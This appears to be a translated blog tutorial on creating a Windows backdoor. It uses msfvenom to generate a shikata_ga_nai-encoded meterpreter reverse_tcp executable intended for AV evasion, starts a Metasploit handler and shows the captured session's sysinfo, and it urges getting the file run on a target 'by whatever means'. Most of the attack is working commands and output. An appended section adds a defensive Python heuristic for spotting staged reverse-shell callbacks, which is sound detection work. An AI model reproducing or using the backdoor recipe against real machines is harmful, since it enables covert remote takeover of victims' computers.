1. First, generate our little darling, which, after later AV-evasion work, gets planted on someone else's machine.
[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.25 lport=6666 -f exe > ./lyshark.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai chosen with final size 476
Payload size: 476 bytes
Final size of exe file: 73802 bytes
[root@localhost ~]#
[root@localhost ~]# ls
lyshark.exe
2. Enter Metasploit and run the following:
[root@localhost ~]# msfconsole
This copy of metasploit-framework is more than two weeks old. Consider running 'msfupdate' to update to the latest version.
[ASCII-art banner omitted]
       =[ metasploit v4.16.55-dev                          ]
+ -- --=[ 1757 exploits - 1004 auxiliary - 306 post       ]
+ -- --=[ 536 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
msf > use exploit/multi/handler
msf exploit(multi/handler) >
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25
msf exploit(multi/handler) > set lport 6666
lport => 6666
3. Get our little darling (lyshark.exe) to run on the target host by whatever means; afterwards you will see the shell bounce back.
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.25:6666
[*] Sending stage (179779 bytes) to 192.168.1.10
[*] Meterpreter session 1 opened (192.168.1.25:6666 -> 192.168.1.10:54264) at 2018-06-02 02:24:17 -0400

meterpreter >
4. At this point the host has fallen; let's take a look at the system.
meterpreter > sysinfo
Computer        : DESKTOP-CACDUAN
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
Note: this method only works if the file actually gets run on the target host, so it is rather brain-dead!
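From the defender's side, as an added example that is not part of the original post: the session above has the characteristic shape of a staged reverse_tcp callback, where the victim (192.168.1.10) connects out to an unusual port and the handler immediately pushes a large second stage (179779 bytes here) back before the client has sent anything substantial. The Python below applies that heuristic to constructed flow records; the port allow-list, byte threshold and ratio are assumptions chosen for illustration, not Metasploit or vendor defaults.

```python
"""Flag flows that look like a staged reverse-shell callback (added example)."""
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass
class Flow:
    src: str        # host that initiated the connection (the victim in a reverse shell)
    dst: str        # host that accepted it (the handler)
    dport: int      # destination port on dst
    bytes_out: int  # bytes sent src -> dst
    bytes_in: int   # bytes sent dst -> src


# Heuristic assumptions (not from the post): a stager sends only a tiny
# request, then the handler floods it with a stage of well over 100 KB on a
# port that carries no ordinary service.
WELL_KNOWN_PORTS = {22, 25, 53, 80, 443, 993, 995, 8080}
MIN_STAGE_BYTES = 100_000   # the post's stage was 179779 bytes
MIN_IN_OUT_RATIO = 20.0     # server-to-client bytes dominate heavily


def looks_like_staged_callback(f: Flow) -> bool:
    """True when the flow matches the outbound-connect / big-stage-inbound pattern."""
    if f.dport in WELL_KNOWN_PORTS:
        return False  # ordinary downloads on real services are not our target
    if f.bytes_in < MIN_STAGE_BYTES:
        return False  # too small to be a meterpreter stage
    return f.bytes_in / max(f.bytes_out, 1) >= MIN_IN_OUT_RATIO


def triage(flows: Iterable[Flow]) -> List[Tuple[str, str, int]]:
    """Return (victim, handler, port) for every suspicious flow."""
    return [(f.src, f.dst, f.dport) for f in flows if looks_like_staged_callback(f)]


# Constructed sample flows modelled on the session in the post.
SAMPLE_FLOWS = [
    Flow("192.168.1.10", "192.168.1.25", 6666, bytes_out=412, bytes_in=179779),   # the callback
    Flow("192.168.1.10", "93.184.216.34", 443, bytes_out=1500, bytes_in=250000),  # normal HTTPS download
    Flow("192.168.1.10", "192.168.1.1", 53, bytes_out=60, bytes_in=120),          # DNS
    Flow("192.168.1.10", "192.168.1.30", 8000, bytes_out=5000, bytes_in=4000),    # balanced chatter
]

if __name__ == "__main__":
    for victim, handler, port in triage(SAMPLE_FLOWS):
        print(f"suspicious staged callback: {victim} -> {handler}:{port}")
```

A real deployment would also correlate the flow with the new process that opened the socket, since the post's whole premise is that a freshly dropped exe makes the connection.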
Generating an exe backdoor with Metasploit and getting a shell
Original post: https://www.cnblogs.com/LyShark/p/9125335.html